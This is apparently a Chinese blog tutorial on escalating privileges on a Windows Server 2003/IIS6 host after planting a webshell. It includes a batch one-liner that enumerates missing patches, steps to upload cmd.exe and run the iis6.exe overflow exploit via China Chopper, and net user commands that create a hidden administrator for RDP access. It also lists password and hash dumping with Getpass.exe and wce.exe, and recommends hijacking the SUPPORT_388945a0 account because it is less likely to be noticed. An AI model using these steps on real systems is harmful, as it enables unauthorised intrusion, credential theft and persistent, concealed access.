美文网首页
windows提权--------IIS6.exe溢出提权

windows提权--------IIS6.exe溢出提权

作者: 不吃鱼的猫_de06 | 来源:发表于2018-06-25 17:41 被阅读0次

提权方式:
操作系统漏洞提权:
systeminfo
查看未修补的补丁编号
KB952004 MS09-012 PR -pr.exe
KB956572 MS09-012 巴西烤肉
KB970483 MS09-020 IIS6溢出 -iis6.exe
LPK劫持 -lpk.dll

windows 2003>>

systeminfo>C:\Windows\Temp\temp.txt&(for %i in (KB3057191
KB2840221 KB3000061 KB2850851 KB2711167 KB2360937
KB2478960 KB2507938 KB2566454 KB2646524 KB2645640
KB2641653 KB944653 KB952004 KB971657 KB2620712
KB2393802 KB942831 KB2503665 KB2592799 KB956572
KB977165 KB2621440) do @type C:\Windows\Temp\temp.txt|
@find /i "%i"|| @echo %i Not Installed!)&del /f /q /a C:\Windows
\Temp\temp.txt

通用型>>

systeminfo>C:\Windows\Temp\temp.txt&(for %i in (KB3124280
KB3143141 KB3134228 KB3079904 KB3077657 KB3124280
KB3045171 KB2829361 KB3000061 KB2850851 KB2707511
KB970483 KB2124261 KB2271195) do @type C:\Windows
\Temp\temp.txt|@find /i "%i"|| @echo %i Not Installed!)&del /f /
q /a C:\Windows\Temp\temp.txt


查看未补漏洞 根据没有修补的补丁号码,到网上找利用程序 进行利用

提权的思路:
1.查找可读可写目录。
2.上传cmd.exe
3.查看未修补补丁的漏洞编号,根据没有修补的补丁号码,到网上寻找利用程序,进行利用。
4.上传exp进行利用。


拿到一个WebShell 之后查看对方服务器信息

查看组件支持是否支持wscript.shell命令执行组件:


image.png

执行Webshell 自带的cmd.exe 发现不可用


image.png image.png

直接用webshell在网站根目录下写一个一句话使用菜刀链接。


image.png

提示拒绝访问 说明权限不允许,我们自己上传一个cmd.exe。上传目录要求是:可读,可写,可执行---------zqlonecmd.exe

image.png image.png

在webshell中执行命令

image.png

Network Service是Windows 2003中新内置的一个被严格限制的账号。该用户可以执行一些简单的命令. 但不能直接net user 添加用户。

image.png

接下来我们执行检测 补丁号的脚本
systeminfo>C:\Windows\Temp\temp.txt&(for %i in (KB3124280 KB3143141 KB3134228 KB3079904 KB3077657 KB3124280 KB3045171 KB2829361 KB3000061 KB2850851 KB2707511 KB970483 KB2124261 KB2271195) do @type C:\Windows \Temp\temp.txt|@find /i "%i"|| @echo %i Not Installed!)&del /f / q /a C:\Windows\Temp\temp.txt

image.png

使用菜刀链接iis6.exe

image.png

接下来就可以:
1. 修改管理员密码
2. 创建一个新用户 添加到管理员组
3.提取当前登录用户密码 (Getpass.exe)
4. 修改帮助账号(SUPPOTR_388945a0)的密码,并添加管理员组 (比较不容易被发现,推荐使用)
5. 提取用户密码哈希值(wce.exe)

创建用户:net user 用户名 密码 /add     


image.png

然后进行提权,提升为管理员;net localgroup administrators 用户名 /add

image.png

然后就可以进行远程连接   -----mstsc(远程桌面连接)


image.png

输入刚刚的用户名密码,成功登陆;

相关文章

  • windows提权--------IIS6.exe溢出提权

    提权方式:操作系统漏洞提权:systeminfo查看未修补的补丁编号KB952004 MS09-012 ...

  • 17.提权

    提权方法:溢出漏洞提权、数据库提权(mysql提权(udf提权,mof提权,自启动提权)、mssql提权)、第三方...

  • Linux提权

    简单概述Linux的几种提权的办法。 内核溢出提权 mysql udf提权 上传库文件 执行库文件创建命令执行函数...

  • windows提权

    一、常见提权方法 1、溢出漏洞提权 2、数据库提权 3、第三方软件提权 二、Cmd命令无法执行原因分析 1、Cmd...

  • windows操作系统提权基础

    1 Windows提权整体总结 2 Windows基础提权命令 2.1 查看系统信息 systeminfo | f...

  • Windows提权

    0x00 基于密码破解的提权 一、密码窃取的常用手段 1.中间人劫持:网络窃听2.通过简单猜测:常用密码3.通过系...

  • Windows提权/Linux提权,内网渗透,内网提权

    一个提权靶场,一个关于fire and shadow的世界 这里的提权有:CVE-2019-1388、CVE-20...

  • Windows提权小技巧

    前言 最近在整理windows提权,各种姿势层出不穷。这里分享一篇windows提权的小技巧。 IIS权限 某次获...

  • Windows提权入门

    一、访问令牌伪造 基础知识 windows系统中存在以下两种令牌: 授权令牌Delegate Token:用于交互...

  • Windows提权小结

    系统内核溢出漏洞提权: 方法一,查找相应补丁漏洞的辅助查询页面:https://github.com/SecWik...

网友评论

      本文标题:windows提权--------IIS6.exe溢出提权

      本文链接:https://www.haomeiwen.com/subject/fugyyftx.html